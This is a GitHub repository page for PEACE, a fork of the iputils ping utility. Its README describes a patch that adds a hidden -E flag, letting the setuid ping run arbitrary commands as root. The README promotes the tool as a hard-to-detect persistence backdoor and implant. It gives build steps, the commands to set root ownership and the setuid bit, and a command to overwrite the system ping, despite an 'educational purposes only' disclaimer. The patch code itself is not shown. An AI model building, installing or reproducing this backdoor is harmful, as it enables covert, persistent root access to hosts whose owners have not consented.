Skip to content
PEACE: Ping Executes Any Command Entered
C Meson Other
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
build-aux
doc
ninfod
systemd
.gitignore
.travis.yml
LICENSE
LICENSE.BSD3
LICENSE.GPL2
Makefile
README.md
RELNOTES.old
arping.c
clockdiff.c
configure
git-version.h.meson
iputils_md5dig.h
meson.build
meson_options.txt
ping.c
ping.h
ping6_common.c
ping_common.c
rarpd.c
rdisc.c
tftp.h
tftpd.c
tftpsubs.c
tracepath.c
traceroute6.c

README.md

PEACE ☮

Ping Executes Any Command Entered

About

Welcome to PEACE!

Peace is a very small patch to the well-known ping command, which leverages the utility's setuid bit to execute arbitrary commands with root privileges. The result is a fully functional version of ping, with an additional flag (-E) used to enable command execution.

Because it's well-known that ping requires the setuid bit to function, and because versions of ping compiled with the PEACE patchset function just as expected, it's relatively unlikely that Peace's added functionality will be discovered. This makes Peace useful as a persistence mechanism (to maintain administrative access to a host), or as an implant for competitive security scrimmages.

As usual, this utility is for educational purposes only, and should not be used for any malicious purpose. PEACE is licensed under BSD-3.

Building PEACE

This repository is a fork of iputils, which hosts the original source code for ping and other assorted tools.

To build PEACE from source, you'll need to install the following dependencies:

$ apt install libcap-dev pkg-config libssl-dev python3 python3-pip ninja-build

Iputils uses Meson as their build system of choice. You can install it on your system using pip3:

$ pip3 install meson

Once these dependencies are satisfied, you can clone this repository and build Peace. After cloning, cd into the root of this repo and run the following:

$ ./configure
$ make

Meson will build and link all of the utilities in this repository, including ping. You'll find the patched version of ping in the builddir directory.

Finally, ensure that the correct permissions and setuid bit are set on the newly produced ping binary:

$ cd builddir
$ chmod u+x ping
$ sudo chown root:root ping
$ sudo chmod +s ping # Add the setuid bit

Note that you may have to cross-compile Peace if your target is running a different architecture than the system you're building it on.

Installation

To install PEACE, you'll need to have some sort of administrator-level access to the target host.

After following the build instructions above, you can simply overwrite the system's copy of ping with your special, patched version:

$ sudo mv ping `which ping`

Demo

You can see a short demonstration of PEACE in use here.

You can’t perform that action at this time.